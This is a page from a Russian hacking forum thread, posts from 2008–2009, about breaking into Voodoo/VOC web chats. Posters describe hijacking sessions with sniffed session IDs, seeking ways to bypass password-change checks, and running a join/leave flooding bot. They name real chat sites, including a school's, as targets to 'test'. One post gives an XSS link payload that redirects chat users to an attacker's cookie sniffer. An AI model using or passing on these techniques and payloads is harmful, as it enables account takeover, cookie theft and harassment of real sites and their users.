ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 08.06.2008, 18:28
Аватар для bloodAngel
bloodAngel
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141

Репутация: 17
Отправить сообщение для bloodAngel с помощью ICQ
По умолчанию

привет парни! у меня проблема из таким чатом!!! я не могу восползоватса сесией !я из Укр. я перехватил сесию и немогу ей воспользоватса!!

Последний раз редактировалось bloodAngel; 16.12.2008 в 19:32..
 
Ответить с цитированием

  #232  
Старый 27.06.2008, 20:23
Аватар для F3x111TsSL
F3x111TsSL
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200

Репутация: 6
По умолчанию

получал доступ по ИД сессии
ИД получал при помощи снифера
все просто

очень жаль что чат который меня интересует при смене пароля требует старый пароль поэтому даже с панели управления ник не угнать. только напакостить можно

давайте вместе подумаем как обойти подтверждение старого пароля при смене оного
 
Ответить с цитированием

  #233  
Старый 10.12.2008, 20:07
Аватар для Invision
Invision
Новичок
Регистрация: 24.08.2008
Сообщений: 29
Провел на форуме:
22773

Репутация: 1
По умолчанию

Вот убитый чат: http://pro-chat.tomsk.ru
перфикс chat/ - работает на voodoo =)
 
Ответить с цитированием

  #234  
Старый 11.12.2008, 18:12
Аватар для NModern
NModern
Новичок
Регистрация: 10.12.2008
Сообщений: 3
Провел на форуме:
14629

Репутация: 0
По умолчанию

кто может дать сниффер????



дам мазгадёра для воодоо.

принцип работы: автоматом заходит на чат и выходит из чата

а в чате пишется например

12:01:01 Вася зашел
12:01:02 Вася вышел
12:01:03 Вася зашел
12:01:04 Вася вышел

и этим чат заполняется

а админ не может выгнат потому что сессия каждый раз меняется

можно выгнать через offban если есть
_________________________

и почему никто не пишет что если захватить сессию можно и "voc.php?session=сессия" написать и зайти. откроется весь чат а не только sender.php

и есть кто нибудь с кем можно было бы посаветоватся по темам ява, пхп
 
Ответить с цитированием

  #235  
Старый 03.01.2009, 14:43
Аватар для Nitrogeniys
Nitrogeniys
Новичок
Регистрация: 25.12.2008
Сообщений: 22
Провел на форуме:
244414

Репутация: 11
Отправить сообщение для Nitrogeniys с помощью ICQ
По умолчанию

Лучше залей на сайт снифер в место авы и сиди болдей!
 
Ответить с цитированием

  #236  
Старый 11.01.2009, 14:52
Аватар для Sheffavenger
Sheffavenger
Новичок
Регистрация: 25.12.2008
Сообщений: 1
Провел на форуме:
3879

Репутация: 0
По умолчанию

так как С VOC++ Business Special Edition рабочие взломы админки есть?или никто ещё непридумал?
 
Ответить с цитированием

  #237  
Старый 12.01.2009, 23:07
Аватар для Giiiiig
Giiiiig
Новичок
Регистрация: 11.01.2009
Сообщений: 1
Провел на форуме:
18536

Репутация: 0
По умолчанию

skajite rebiata shtoza versia

http://www.akoce.com


i kak mne dastats hash admina ia sdelal

xss no kinul mne svou hash no ia xochu hash admina

voobshem versiu skajite ((
 
Ответить с цитированием

  #238  
Старый 09.02.2009, 00:27
Аватар для SmоrK
SmоrK
Новичок
Регистрация: 19.01.2009
Сообщений: 28
Провел на форуме:
284805

Репутация: 49
Отправить сообщение для SmоrK с помощью ICQ
Wink

Цитата:
Сообщение от Giiiiig  
skajite rebiata shtoza versia

http://www.akoce.com


i kak mne dastats hash admina ia sdelal

xss no kinul mne svou hash no ia xochu hash admina

voobshem versiu skajite ((
обычный вуду тока с обложкой красиваой!
язык на чате фиг его знает орабский какойто!
версия 0.18.16
-=-=-=-=-=-=-=-=-=

NModern закинь сюда мазгадёра

а в чате пишется например

12:01:01 Вася зашел
12:01:02 Вася вышел
12:01:03 Вася зашел
12:01:04 Вася вышел

и этим чат заполняется

Последний раз редактировалось SmоrK; 09.02.2009 в 00:44..
 
Ответить с цитированием

  #239  
Старый 14.02.2009, 12:44
Аватар для gold_555
gold_555
Новичок
Регистрация: 14.02.2009
Сообщений: 2
Провел на форуме:
7033

Репутация: 0
По умолчанию

Всем привет! Ребят, протестите плиз вот этот чат http://licey24.lipetsk.ru/chat Админ полный ламер, недавно хоть догодался закрыть директорию http://licey24.lipetsk.ru/data через .htaccess
 
Ответить с цитированием

  #240  
Старый 14.02.2009, 12:56
Аватар для gold_555
gold_555
Новичок
Регистрация: 14.02.2009
Сообщений: 2
Провел на форуме:
7033

Репутация: 0
По умолчанию

У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя:

Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html

file.html содержит следующий код
PHP код:
<a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a
Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки

Такое реально???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
voodoo уязвимость при банне JRX Чаты 6 19.11.2006 01:42
Привет парни помогите с Voodoo чат chat.tus.ru Spider_Klim Чаты 3 27.07.2006 09:48
Чаты августа ломаются ? SEVKA Чаты 123 25.05.2006 10:50
Voodoo chat Guest Чаты 8 08.07.2005 12:01
VooDoo чаты Spectrum Чаты 6 16.05.2005 20:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ